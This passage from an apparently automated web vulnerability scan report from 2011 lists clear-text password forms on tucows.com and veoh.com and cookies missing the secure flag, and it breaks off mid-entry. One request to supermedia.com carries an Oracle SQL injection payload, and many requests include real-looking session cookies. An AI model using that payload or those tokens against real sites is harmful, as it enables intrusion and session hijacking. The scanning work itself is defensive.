Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.77. http://www.tucows.com/software.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /software.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /software.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 49878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Download Windows Fre
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.78. http://www.tucows.com/terms.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.79. http://www.tucows.com/terms.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /terms.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /terms.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:26 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 38411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

6.80. http://www.veoh.com/favorites  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favorites

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /favorites HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.81. http://www.veoh.com/login  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /login

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /login HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:54 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.82. http://www.veoh.com/messages/inbox  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /messages/inbox

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /messages/inbox HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:09 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.83. http://www.veoh.com/myinterests  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myinterests

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /myinterests HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 25409

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.84. http://www.veoh.com/myplaylists  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myplaylists

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /myplaylists HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 25387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.85. http://www.veoh.com/myprofile/videos  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /myprofile/videos

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /myprofile/videos HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=56
Content-Length: 25399

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.86. http://www.veoh.com/publish/video  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /publish/video

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /publish/video HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 25294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

       <form id="loginForm" action="/login/submit" method="post" onsubmit="return VeohUtils.login();">
           <label>
...[SNIP]...
</label>
           <input type="password" name="p" id="login-p" /><div class="clear">
...[SNIP]...

6.87. http://www.veoh.com/register  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /register HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:45:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 52657

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
</div>

       <form id="form-register" method="POST">

           <fieldset>
...[SNIP]...
</label>
               
<input type="password" name="password" id="password" value="" />                
               <label for="password2">
...[SNIP]...
</label>
               
<input type="password" name="password2" id="password2" value="" />                
               <label for="countryId">
...[SNIP]...

7. SQL statement in request parameter  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /spportal/spportalFlow.do

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=B97B42F53A51F0DBCC634E0E00A27A8F.app2-a1; trafficSource="SP198c8\"; CstrStatus=U; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a423660; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296761536|check#true#1296759736; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Thu, 03 Feb 2011 19:03:27 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Content-Length: 20307


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages
...[SNIP]...

8. SSL cookie without secure flag set  previous  next
There are 15 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://livechat.boldchat.com/aid/3760177095415339810/bc.chat  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://livechat.boldchat.com
Path:   /aid/3760177095415339810/bc.chat

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aid/3760177095415339810/bc.chat HTTP/1.1
Host: livechat.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
